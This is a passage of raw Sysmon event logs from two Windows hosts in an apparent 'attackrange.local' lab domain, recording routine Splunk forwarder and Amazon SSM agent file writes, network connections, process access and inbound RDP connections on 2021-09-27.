Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F3A09707774A5E3DF7713EFF2F65E66,SHA256=2ADD90172A8DF4F68CC1610C0758456FA4253608CF3C343E7F6248EE9528618B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:33.832{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4309MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:33.443{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F07AA2291F6681C3BFFDB89A072D6F9,SHA256=B8F0B0DC93462214F6CA8039E4991897120932346CEFD3B94B3914C4750FB6A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:33.563{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4BA867562E0CFE03B976FDE48EC4D8E,SHA256=19996ABE51D3B18E4210518C79234A121F4F54BCBF6FFCCB292184594CC3B32C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:34.610{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE2AC610A83449F033699134ACAE670D,SHA256=1954C7D8C25C3B7A36EBFE5E22B589F17DB5688E38AA64CC1D99AF8E627F0CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:34.830{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4310MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:32.803{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:34.480{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42FDFBE111CBA7087A9C4B4DCE3D2FDE,SHA256=EC2FD90884B195AE9CDF8E319F548ADCB7C8FF7949F5250E18F19A55DD34F9CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:35.498{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0DFC326D2107E108AD15C9E65E2F9A3,SHA256=075CAC25DFA3D57A31B3812226A3C91D3EB1C77F5BBA82781618FA286768BFCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:35.720{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=419658870976301CED2A3FFC699D7EDC,SHA256=71D56F09BD8A74A9104D5C82B01606B95DFEF16D9BEE2284CD75B862F70707DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:31.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59405-false10.0.1.12-8000- 23542300x8000000000000000979215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:35.626{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2B4076A22C5CC88DBBCA7F3DEF7A1D5,SHA256=76318A55457ACCBD5543DA6FEB089DF582EF4FE3189FADBC2FFBAB4D86C3A624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:36.681{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:36.514{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCEBFFEA2D4F5F88B499FCD5A5738DD,SHA256=38304F39E95B3662733F722544251651CF8F5B06C1D34D1BC2EE70F00453E617,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:33.032{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59419-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:32.773{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50748-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:36.626{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7535141E3176F1ADA433EBFF03D377,SHA256=5D7277310BC7E85D3E298E9DCA9044FAE68385F510E5CEFB9CDD24FA9287DA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.642{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6DE800CB0ECDDB030581809574F4813,SHA256=B4F67B9D140386EAF798D045F289CF562CD12298FBE482138B568979A333982B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:37.529{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5E44AF4DFFC31701CC9A5903C2D57EF,SHA256=235B5A18AB695D85503F609846385838E2EE023BF8D49E01F7C94710ACFB8526,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B41-6151-D479-00000000FD01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.423{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.407{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8B41-6151-D479-00000000FD01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.407{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B41-6151-D479-00000000FD01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.408{69CF5F33-8B41-6151-D479-00000000FD01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:38.642{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=683C16961E045A33A24F2470431EAE1F,SHA256=AE0FD6A8BF2E3433470E52A06C23093B157B439704E017A69B101E1E21071CBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:36.368{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53390-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001050524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:38.559{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7B6B6B1127DF0F7E7581875CEF9C0B,SHA256=A7942EB6D9498766E5AD9D0D347E15BAEA547F215213FCD56B74A6470F17610D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:38.454{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8A648751F0CF2D3FA944AD3190A6255,SHA256=90A598650CC7A5F334019232DBF186FE0895D085E18D4E064FFD00E7865B1A33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:39.642{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8E4D80D04497704F7A1E4AAB04DE71,SHA256=7F67C731A16E77325876726CF3EB43AEE75CD882FDE48ED735CCA4BE3461F72C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:39.559{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9F8D208CA40320ADA1845E6AE0E44F6,SHA256=E76DE973A9DE3600D8A0A33D90BF30B3FBFE4630B6489961EDA140EE2FA177F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:39.297{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8EC6970C48EEA42A64ED55E880A0CE51,SHA256=8C4A4B3F5585A8242EDB60E30DC4A2DFF53A9E2D958712A25E816685CADA184D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:40.954{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF86AFE1E8732BC548CAA1EF8346EDF9,SHA256=7EEDDC6D5D5D2E62684CE74601370B3D413A8AE2F8836C434E6AE3861BD6E817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:40.642{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 